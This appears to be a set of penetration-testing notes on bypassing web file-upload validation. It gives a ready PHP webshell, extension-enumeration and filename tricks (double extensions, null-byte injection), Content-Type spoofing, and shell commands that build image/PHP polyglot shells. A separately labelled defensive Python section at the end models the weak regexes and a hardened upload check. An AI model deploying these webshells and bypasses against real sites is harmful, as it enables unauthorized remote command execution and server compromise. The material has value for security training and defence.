# Webshells

```php
<?php system($_REQUEST["cmd"]); ?>
```
## Bypass validations

### Client side
Disable JavaScript, or use an intercepting proxy like Burp or ZAP. You should be pretty familiar with this, so no instructions here.
### Blacklist filter

This is when the webapp blocks certain extensions like `php`, `phps`, `php7`. Not effective, since we can use another file extension that still executes PHP code, like `phar`.

First we can find all the extensions that this webapp uses:

```bash
ffuf -u "http://$target/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ
```

After we get a list of which extensions we can use, we can try uploading our webshell with the extension changed.
### Whitelist filter

This is when the webapp only allows certain extensions like `.jpg`, `.jpeg`, `.png`. Secure, but sometimes we can find a vulnerability.
#### Double Extensions

When the webapp checks for extensions using a regex like `^.*\.(jpg|jpeg|png|gif)`, there is a vulnerability: the regex only checks that `.jpg`, `.jpeg`, `.png` or `.gif` appears somewhere in the file name, not at the end of it (there is no `$` anchor).

So we can simply rename our webshell to `shell.jpg.php`.
#### Reverse Double Extensions

This is when the web server configuration itself is vulnerable. For example, this Apache2 config:

```apache
<FilesMatch ".+\.ph(ar|p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
```

The above config determines which files are handed to the PHP handler. Again, it does not check that the extension is at the end of the file name (no `$` anchor), so any name containing `.php` gets executed.

So we can simply rename our webshell to `shell.php.jpg`.
#### Character injection

`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…`, `:`

Basically a way to "terminate" the string so that it ends at `.php`, e.g. `shell.php%00.jpg`. Btw, the `%00` null-byte truncation trick has been patched since PHP 5.?? (don't remember exactly which).
### Type filter

#### Content Type

This is when the webapp looks only at the `Content-Type` header we send, which we can "spoof".

#### Mime Type

This is when the webapp actually determines our file type by looking at the magic bytes. Can be bypassed easily by prepending the right magic bytes:
```bash
echo 'GIF8;' > shell.gif
echo '89504E470D0A1A0A' | xxd -r -p > shell.png
echo 'FFD8FFDB' | xxd -r -p > shell.jpg
```

Then append our webshell after that:

```bash
echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.gif
echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.png
echo '<?php system($_REQUEST["cmd"]); ?>' >> shell.jpg
```
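The defender's view of the Double Extensions, Reverse Double Extensions, Character injection and Mime Type sections above, as an added example that is not part of these notes: a small Python model of the unanchored whitelist regex and the Apache `FilesMatch` pattern next to a hardened check that requires the allowlisted extension at the very end of the name and confirms the magic bytes agree with it. The regexes and magic bytes are the ones from the notes; everything else (function names, the 64-character name limit) is an assumption of this example.

```python
import re

# Unanchored pattern from the notes: ".jpg" only has to appear SOMEWHERE in the name.
WEAK_EXT_RE = re.compile(r"^.*\.(jpg|jpeg|png|gif)")
# Hardened: one base name, exactly one dot, allowlisted extension, nothing after it.
# Checked with fullmatch() rather than "$": in Python "$" also matches before a trailing "\n".
STRICT_EXT_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)")
# The Apache FilesMatch pattern from the notes; unanchored, so ".php" anywhere in the
# name sends the file to the PHP handler.
APACHE_PHP_RE = re.compile(r".+\.ph(ar|p|tml)")

# Magic bytes as used in the notes; the GIF check only needs the "GIF8" prefix.
MAGIC = {
    "gif": b"GIF8",
    "png": bytes.fromhex("89504E470D0A1A0A"),
    "jpg": bytes.fromhex("FFD8FFDB"),
}

def weak_ext_check(name: str) -> bool:
    """The vulnerable whitelist check: accepts shell.jpg.php."""
    return WEAK_EXT_RE.match(name) is not None

def strict_ext_check(name: str) -> bool:
    """Allowlisted extension must be the last thing in the name. Path separators,
    NUL/control characters and ':' are rejected because the class does not contain them."""
    return STRICT_EXT_RE.fullmatch(name) is not None

def apache_executes_php(name: str) -> bool:
    """Would the notes' FilesMatch rule hand this stored name to PHP?"""
    return APACHE_PHP_RE.search(name) is not None

def upload_allowed(name: str, data: bytes) -> bool:
    """Combined decision: extension at the end of the name, magic bytes that agree with
    that extension, and a stored name the PHP handler can never pick up. Magic bytes
    alone are not enough ('GIF8;<?php ...' passes them); the name/handler checks are
    what keep such a file from ever being executed, so never skip them."""
    if not strict_ext_check(name):
        return False
    ext = name.rsplit(".", 1)[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    if not data.startswith(MAGIC[ext]):
        return False
    return not apache_executes_php(name)

if __name__ == "__main__":
    # Constructed sample names mirroring the bypasses described in the notes.
    for n in ["photo.jpg", "shell.jpg.php", "shell.php.jpg", "shell.php\x00.jpg", "shell.jpg\n"]:
        print(repr(n), "weak:", weak_ext_check(n), "strict:", strict_ext_check(n),
              "php-handler:", apache_executes_php(n))
```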